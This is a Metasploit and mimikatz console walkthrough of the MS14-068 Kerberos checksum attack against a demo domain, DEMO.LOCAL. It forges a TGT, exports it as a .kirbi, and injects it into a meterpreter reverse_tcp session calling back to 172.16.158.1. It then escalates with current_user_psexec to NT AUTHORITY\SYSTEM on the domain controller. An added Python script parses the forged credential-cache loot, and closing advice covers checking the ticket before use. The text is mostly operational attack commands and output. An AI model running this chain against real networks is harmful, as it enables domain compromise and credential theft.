msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD                   yes       The Domain User password
   RHOST                      yes       The target address
   RPORT     88               yes       The target port
   Timeout   10               yes       The TCP timeout to establish connection and read data
   USER                       yes       The Domain User
   USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN DEMO.LOCAL
DOMAIN => DEMO.LOCAL
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD juan
PASSWORD => juan
msf auxiliary(ms14_068_kerberos_checksum) > set USER juan
USER => juan
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID S-1-5-21-1755879683-3641577184-3486455962-1000
USER_SID => S-1-5-21-1755879683-3641577184-3486455962-1000
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST WIN-F46QAN3U3UH.demo.local
RHOST => WIN-F46QAN3U3UH.demo.local
msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain DEMO.LOCAL...
[*] WIN-F46QAN3U3UH.demo.local:88 - Sending AS-REQ...
[*] WIN-F46QAN3U3UH.demo.local:88 - Parsing AS-REP...
[*] WIN-F46QAN3U3UH.demo.local:88 - Sending TGS-REQ...
[+] WIN-F46QAN3U3UH.demo.local:88 - Valid TGS-Response, extracting credentials...
[+] WIN-F46QAN3U3UH.demo.local:88 - MIT Credential Cache saved on /Users/jvazquez/.msf4/loot/20141223201326_default_172.16.158.135_windows.kerberos_194320.bin
[*] Auxiliary module execution completed
----------------------------------------------
mimikatz # kerberos::clist "20141223201326_default_172.16.158.135_windows.kerberos_194320.bin" /export

Principal : (01) : juan ; @ DEMO.LOCAL

Data 0
           Start/End/MaxRenew: 12/24/2014 3:13:21 AM ; 12/24/2014 1:13:06 PM ; 12/31/2014 3:13:06 AM
           Service Name (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
           Target Name  (01) : krbtgt ; DEMO.LOCAL ; @ DEMO.LOCAL
           Client Name  (01) : juan ; @ DEMO.LOCAL
           Flags 00000000    :
           Session Key       : 0x00000017 - rc4_hmac_nt
             1cf7188debe40565eb668b5fa0bf94fb
           Ticket            : 0x00000000 - null       ; kvno = 2
           [...]
           * Saved to file 0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi !

mimikatz #
---------------------------------------------
msf auxiliary(ms14_068_kerberos_checksum) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 172.16.158.131

meterpreter > getuid
Server username: DEMO\juan
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C"
.## ^ ##.
## / \ ## /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                 (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial`     * * */
success.
meterpreter > kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi
[*] Using Kerberos ticket stored in /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi, 1143 bytes
[+] Kerberos ticket applied successfully
meterpreter >
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter x86/win32  DEMO\juan @ EXPLOITER  172.16.158.1:4444 -> 172.16.158.131:63380 (172.16.158.131)

msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local
RHOSTS => WIN-F46QAN3U3UH.demo.local
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(current_user_psexec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(current_user_psexec) > set SESSION 1
SESSION => 1
msf exploit(current_user_psexec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] WIN-F46QAN3U3UH.demo.local Creating service 51cq2zJN6p
[*] WIN-F46QAN3U3UH.demo.local Starting the service
[*] Sending stage (770048 bytes) to 172.16.158.135
[*] WIN-F46QAN3U3UH.demo.local Deleting the service
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
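The loot file the module writes is an MIT credential cache (ccache), which is why the walkthrough detours through mimikatz' kerberos::clist /export: kerberos_ticket_use in meterpreter wants a .kirbi, not a ccache. The script below is an added example (not code from the original post, Metasploit or mimikatz) that reads a version-4 ccache directly and lists the same fields as the kerberos::clist output above: default principal, client and service names, session-key enctype (0x17 = rc4_hmac_nt), validity window and ticket size. It bounds-checks every read so a truncated or mislabelled file fails with a clear error instead of garbage. build_sample() constructs a one-TGT cache inline so the script runs offline; the principal, session key and times are taken from the listing above (times assumed UTC), and the ticket bytes are a placeholder, not a real ticket.

```python
"""Parse the MIT credential cache (ccache v4) that ms14_068_kerberos_checksum saves.

Added example; not code from the original post, Metasploit or mimikatz.
build_sample() constructs a one-TGT cache inline (principal, key and times from
the kerberos::clist listing, assumed UTC; ticket bytes are a placeholder).
"""
import struct
from datetime import datetime, timezone

# Enctype numbers from RFC 3961 / RFC 4757; 23 is what mimikatz prints as rc4_hmac_nt.
ENCTYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4_hmac_nt"}
NT_PRINCIPAL, NT_SRV_INST = 1, 2  # name types for user principals and krbtgt/REALM


class _Reader:
    """Cursor over the big-endian ccache stream; every read is bounds-checked."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        if self.pos + n > len(self.data):
            raise ValueError("truncated ccache")
        self.pos += n
        return self.data[self.pos - n:self.pos]

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def octets(self): return self.take(self.u32())          # counted_octet_string: len + data

    def principal(self):                                    # name_type, n, realm, n components
        self.u32()
        n = self.u32()
        realm = self.octets().decode()
        return "/".join(self.octets().decode() for _ in range(n)) + "@" + realm


def _ts(t):
    return datetime.fromtimestamp(t, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_ccache(data):
    r = _Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    r.take(r.u16())                                         # v4 header block (DeltaTime), skipped
    result = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(data):                                # credentials run to end of file
        client, server = r.principal(), r.principal()
        enctype, key = r.u16(), r.octets()
        _authtime, start, end, renew = [r.u32() for _ in range(4)]
        r.u8()                                              # is_skey
        flags = r.u32()
        for _ in range(r.u32()): r.u16(); r.octets()        # addresses: type + data
        for _ in range(r.u32()): r.u16(); r.octets()        # authdata: type + data
        ticket, _second_ticket = r.octets(), r.octets()
        result["credentials"].append({
            "client": client, "server": server, "flags": f"{flags:08x}",
            "enctype": ENCTYPES.get(enctype, f"enctype {enctype}"), "session_key": key.hex(),
            "start": _ts(start), "end": _ts(end), "renew_till": _ts(renew), "ticket_len": len(ticket)})
    return result


def looks_like_ccache(data):
    """True when the bytes parse as a complete v4 ccache; False on garbage or truncation."""
    try:
        parse_ccache(data)
        return True
    except ValueError:
        return False


def _octets(b):
    return struct.pack(">I", len(b)) + b


def _principal(name, name_type):
    comps, realm = name.rsplit("@", 1)
    parts = comps.split("/")
    return struct.pack(">II", name_type, len(parts)) + _octets(realm.encode()) + b"".join(_octets(p.encode()) for p in parts)


def build_sample():
    """Constructed one-TGT cache in the shape of the module's loot file (sample data, not a real ticket)."""
    def epoch(*ymdhms): return int(datetime(*ymdhms, tzinfo=timezone.utc).timestamp())
    start, end, renew = epoch(2014, 12, 24, 3, 13, 21), epoch(2014, 12, 24, 13, 13, 6), epoch(2014, 12, 31, 3, 13, 6)
    header = struct.pack(">HHII", 1, 8, 0, 0)                           # tag 1 = DeltaTime, zero offsets
    out = b"\x05\x04" + struct.pack(">H", len(header)) + header
    out += _principal("juan@DEMO.LOCAL", NT_PRINCIPAL)                   # default principal
    out += _principal("juan@DEMO.LOCAL", NT_PRINCIPAL)                   # credential: client, then server
    out += _principal("krbtgt/DEMO.LOCAL@DEMO.LOCAL", NT_SRV_INST)
    out += struct.pack(">H", 23) + _octets(bytes.fromhex("1cf7188debe40565eb668b5fa0bf94fb"))
    out += struct.pack(">IIII", start, start, end, renew)                # authtime, start, end, renew_till
    out += b"\x00" + struct.pack(">I", 0) + struct.pack(">II", 0, 0)     # is_skey, flags 00000000, no addrs/authdata
    return out + _octets(b"PLACEHOLDER-TICKET-BYTES") + _octets(b"")     # ticket, empty second_ticket


if __name__ == "__main__":
    for c in parse_ccache(build_sample())["credentials"]:
        print(f"{c['client']} -> {c['server']} ; {c['enctype']} ; key {c['session_key']}")
        print(f"Start/End/MaxRenew: {c['start']} / {c['end']} / {c['renew_till']} ; ticket {c['ticket_len']} bytes")
```

Point parse_ccache at the real loot file (open(path, "rb").read()) to confirm the service name is krbtgt/DOMAIN and the key is rc4_hmac_nt before handing the ticket to mimikatz; the validity window also tells you how long the forged TGT stays usable without renewal.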